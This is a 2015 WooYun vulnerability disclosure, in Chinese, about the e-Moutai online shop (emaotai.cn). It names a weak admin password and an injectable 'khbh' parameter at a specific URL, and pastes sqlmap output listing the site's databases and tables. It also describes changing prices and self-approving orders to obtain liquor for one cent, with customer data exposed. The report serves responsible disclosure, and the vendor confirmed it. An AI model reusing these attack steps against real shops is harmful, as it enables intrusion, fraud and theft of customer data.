当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152877

漏洞标题:电商安全之e茅台主站sql注入(免费购买国酒茅台/大量用户信息泄漏)

相关厂商:emaotai.cn

漏洞作者: 路人甲

提交时间:2015-11-09 09:36

修复时间:2015-12-24 09:46

公开时间:2015-12-24 09:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开

简要描述:

电商安全之e茅台主站sql注入(大量用户信息泄漏/免费购买国酒茅台)

详细说明:

电商安全之e茅台主站sql注入(大量用户信息泄漏/免费购买国酒茅台)
茅台主站

http://www.emaotai.cn/


QQ20151108-0.png


QQ20151108-1.png


QQ20151108-2.png


双十一还有活动哈
弱口令进入后台

QQ20151108-3.png


www.emaotai.cn:90/zyd/Member/HyReg.aspx?khbh=20130523000007&op=2&ReturnPage=HyList2.aspx


khbh参数存在注入

QQ20151108-4.png


库就18个

QQ20151108-5.png


茅台不愧是国酒 后台数据多的夸张 就不逐一去跑了

[22:04:01] [INFO] fetching database names
[22:04:01] [INFO] the SQL query used returns 18 entries
[22:04:01] [INFO] resumed: distribution
[22:04:01] [INFO] resumed: DrpEco
[22:04:01] [INFO] resumed: drpecosdl
[22:04:01] [INFO] resumed: DrpEcoTest
[22:04:01] [INFO] resumed: eAct
[22:04:01] [INFO] resumed: eActTest
[22:04:01] [INFO] resumed: emaotai_act
[22:04:01] [INFO] resumed: emaotai_act_test
[22:04:01] [INFO] resumed: emaotai_logs
[22:04:01] [INFO] resumed: hishop
[22:04:01] [INFO] resumed: master
[22:04:01] [INFO] resumed: model
[22:04:01] [INFO] resumed: moutai
[22:04:01] [INFO] resumed: moutaitest
[22:04:01] [INFO] resumed: msdb
[22:04:01] [INFO] resumed: ReportServer
[22:04:01] [INFO] resumed: ReportServerTempDB
[22:04:01] [INFO] resumed: tempdb
[22:04:01] [INFO] fetching tables for databases: DrpEco, DrpEcoTest, ReportServer, ReportServerTempDB, distribution, drpecosdl, eAct, eActTest, emaotai_act, emaotai_act_test, emaotai_logs, hishop, master, model, moutai, moutaitest, msdb, tempdb
[22:04:01] [INFO] the SQL query used returns 237 entries
[22:04:01] [INFO] the SQL query used returns 39 entries
[22:04:01] [INFO] the SQL query used returns 68 entries
[22:04:01] [INFO] retrieved: dbo.t_xtgl_rjmkbmb
[22:04:02] [INFO] retrieved: dbo.t_xtgl_spjg
[22:04:02] [INFO] retrieved: dbo.t_xtgl_spml
[22:04:02] [INFO] retrieved: dbo.t_xtgl_xzqh
[22:04:02] [INFO] retrieved: dbo.t_xtgl_xzsf
[22:04:02] [INFO] the SQL query used returns 27 entries
[22:04:02] [INFO] retrieved: dbo.act_info
[22:04:02] [INFO] retrieved: dbo.act_photo
[22:04:03] [INFO] retrieved: dbo.act_purchase_log
[22:04:03] [INFO] retrieved: dbo.act_result
[22:04:03] [INFO] retrieved: dbo.act_result_bak_201528
[22:04:04] [INFO] retrieved: dbo.act_result_coupon
[22:04:04] [INFO] retrieved: dbo.act_rule
[22:04:04] [INFO] retrieved: dbo.act_sys_config
[22:04:04] [INFO] retrieved: dbo.act_ticket_a
[22:04:05] [INFO] retrieved: dbo.act_ticket_b
[22:04:05] [INFO] retrieved: dbo.act_ticket_c
[22:04:05] [INFO] retrieved: dbo.act_ticket_d
[22:04:05] [INFO] retrieved: dbo.act_ticket_e
[22:04:06] [INFO] retrieved: dbo.act_ticket_f
[22:04:06] [INFO] retrieved: dbo.act_ticket_test
[22:04:06] [INFO] retrieved: dbo.act_vote
[22:04:06] [INFO] retrieved: dbo.act_vote_detail
[22:04:06] [INFO] retrieved: dbo.act_wx_share_log
[22:04:06] [INFO] retrieved: dbo.act_wx_userinfo
[22:04:07] [INFO] retrieved: dbo.draw_user
[22:04:07] [INFO] retrieved: dbo.gift_detail
[22:04:07] [INFO] retrieved: dbo.gift_list
[22:04:07] [INFO] retrieved: dbo.gift_ticket
[22:04:07] [INFO] retrieved: dbo.Log_sms_result
[22:04:08] [INFO] retrieved: dbo.t_weixin_act
[22:04:11] [INFO] retrieved: dbo.ticket_b
[22:04:11] [INFO] the SQL query used returns 142 entries
[22:04:11] [INFO] retrieved: dbo.#0024001B
[22:04:12] [INFO] retrieved: dbo.#009FF5AC
[22:04:12] [INFO] retrieved: dbo.#01182454
[22:04:12] [INFO] retrieved: dbo.#020C488D
[22:04:13] [INFO] retrieved: dbo.#03006CC6
[22:04:13] [INFO] retrieved: dbo.#037C6257
[22:04:13] [INFO] retrieved: dbo.#03E80D59
[22:04:14] [INFO] retrieved: dbo.#03F490FF
[22:04:14] [INFO] retrieved: dbo.#04708690
[22:04:14] [INFO] retrieved: dbo.#04E8B538
[22:04:14] [INFO] retrieved: dbo.#05DCD971
[22:04:14] [INFO] retrieved: dbo.#06D0FDAA
[22:04:15] [INFO] retrieved: dbo.#07C521E3
[22:04:15] [INFO] retrieved: dbo.#088D923C
[22:04:16] [INFO] retrieved: dbo.#08B9461C
[22:04:16] [INFO] retrieved: dbo.#098BD816
[22:04:16] [INFO] retrieved: dbo.#09AD6A55
[22:04:17] [INFO] retrieved: dbo.#0AA18E8E
[22:04:17] [INFO] retrieved: dbo.#0B95B2C7
[22:04:17] [INFO] retrieved: dbo.#0C89D700
[22:04:18] [INFO] retrieved: dbo.#0D05CC91
[22:04:18] [INFO] retrieved: dbo.#0D3D38C0
[22:04:18] [INFO] retrieved: dbo.#0D7DFB39
[22:04:18] [INFO] retrieved: dbo.#0E315CF9
[22:04:18] [INFO] retrieved: dbo.#0E721F72
[22:04:18] [INFO] retrieved: dbo.#0F6643AB
[22:04:19] [INFO] retrieved: dbo.#105A67E4
[22:04:19] [INFO] retrieved: dbo.#114E8C1D
[22:04:19] [INFO] retrieved: dbo.#1242B056
[22:04:28] [INFO] retrieved: dbo.#1336D48F
[22:04:28] [INFO] retrieved: dbo.#142AF8C8
[22:04:29] [INFO] retrieved: dbo.#1432B864
[22:04:29] [INFO] retrieved: dbo.#14A6EE59
[22:04:29] [INFO] retrieved: dbo.#151F1D01
[22:04:29] [INFO] retrieved: dbo.#1526DC9D
[22:04:29] [INFO] retrieved: dbo.#15660868
[22:04:29] [INFO] retrieved: dbo.#15B1B7D9
[22:04:30] [INFO] retrieved: dbo.#1613413A
[22:04:30] [INFO] retrieved: dbo.#17076573
[22:04:30] [INFO] retrieved: dbo.#17FB89AC
[22:04:30] [INFO] retrieved: dbo.#18EFADE5
[22:04:31] [INFO] retrieved: dbo.#1936994C
[22:04:31] [INFO] retrieved: dbo.#19E3D21E
[22:04:31] [INFO] retrieved: dbo.#1A422E23
[22:04:31] [INFO] retrieved: dbo.#1A5FC7AF
[22:04:34] [INFO] retrieved: dbo.#1AD7F657
[22:04:35] [INFO] retrieved: dbo.#1B1EE1BE
[22:04:35] [INFO] retrieved: dbo.#1B36525C
[22:04:35] [INFO] retrieved: dbo.#1BCC1A90
[22:04:35] [INFO] retrieved: dbo.#1CC03EC9
[22:04:35] [INFO] retrieved: dbo.#1DB46302
[22:04:36] [INFO] retrieved: dbo.#1EA8873B
[22:04:36] [INFO] retrieved: dbo.#1F9CAB74
[22:04:36] [INFO] retrieved: dbo.#1FEE83D3
[22:04:37] [INFO] retrieved: dbo.#2090CFAD
[22:04:37] [INFO] retrieved: dbo.#20D7BB14
[22:04:37] [INFO] retrieved: dbo.#24A9E2A6
[22:04:37] [INFO] retrieved: dbo.#2EF0D041
[22:04:37] [INFO] retrieved: dbo.#2F9E0913
[22:04:37] [INFO] retrieved: dbo.#30922D4C
[22:04:38] [INFO] retrieved: dbo.#383CA55E
[22:04:38] [INFO] retrieved: dbo.#396E5EB4
[22:04:38] [INFO] retrieved: dbo.#3A6282ED
[22:04:39] [INFO] retrieved: dbo.#3B56A726
[22:04:39] [INFO] retrieved: dbo.#3C0D3642
[22:04:48] [INFO] retrieved: dbo.#3C7FD589
[22:04:48] [INFO] retrieved: dbo.#3FDDC726
[22:04:48] [INFO] retrieved: dbo.#4067D70B
[22:04:49] [INFO] retrieved: dbo.#47D4BA00
[22:04:49] [INFO] retrieved: dbo.#47DFA6F8
[22:04:50] [INFO] retrieved: dbo.#483ECE54
[22:04:50] [INFO] retrieved: dbo.#48D3CB31
[22:04:50] [INFO] retrieved: dbo.#49BAA06D
[22:04:50] [INFO] retrieved: dbo.#49C7EF6A
[22:04:50] [INFO] retrieved: dbo.#4ABC13A3
[22:04:51] [INFO] retrieved: dbo.#4AE5657E
[22:04:51] [INFO] retrieved: dbo.#4C0F5F38
[22:04:51] [INFO] retrieved: dbo.#4CA45C15
[22:04:51] [INFO] retrieved: dbo.#4D98804E
^C
[22:04:51] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:51] [INFO] the SQL query used returns 229 entries
[22:04:52] [INFO] retrieved: dbo.backupfile
[22:04:52] [INFO] retrieved: dbo.backupfilegroup
[22:04:52] [INFO] retrieved: dbo.backupmediafamily
[22:04:52] [INFO] retrieved: dbo.backupmediaset
[22:04:52] [INFO] retrieved: dbo.backupset
[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_alert
[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_error_detail
[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_history_detail
[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_primary
[22:04:54] [INFO] retrieved: dbo.log_shipping_monitor_secondary
[22:04:54] [INFO] retrieved: dbo.log_shipping_primaries
[22:04:54] [INFO] retrieved: dbo.log_shipping_primary_databases
[22:04:54] [INFO] retrieved: dbo.log_shipping_primary_secondaries
[22:04:55] [INFO] retrieved: dbo.log_shipping_secondaries
[22:04:55] [INFO] retrieved: dbo.log_shipping_secondary
^C
[22:04:55] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:55] [INFO] the SQL query used returns 224 entries
[22:04:55] [INFO] retrieved: dbo.dtproperties
^C
[22:04:56] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:56] [INFO] the SQL query used returns 573 entries
[22:04:56] [INFO] retrieved: dbo.atest
^C
[22:04:57] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:57] [INFO] the SQL query used returns 13 entries
[22:04:57] [INFO] resumed: dbo.ChunkData
[22:04:57] [INFO] retrieved: dbo.ChunkSegmentMapping
[22:04:57] [INFO] retrieved: dbo.DBUpgradeHistory
^C
[22:04:57] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:58] [INFO] the SQL query used returns 199 entries
[22:04:58] [INFO] retrieved: dbo.aspnet_MemberGrades
^C
[22:04:58] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:58] [INFO] the SQL query used returns 364 entries


然后重点来了 可随意修改价格 然后下单 免费购买国酒茅台

QQ20151108-6.png


QQ20151108-7.png


买完之后 我自己就可以审核通过订单了

QQ20151108-8.png


就这样几千块的茅台 一分钱就能拿到了 我就不下单了 赶快修复吧
还有泄露了大量的客户信息

QQ20151108-9.png


漏洞证明:

已证明

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-09 09:45

厂商回复:

感谢路人甲的反馈

最新状态:

暂无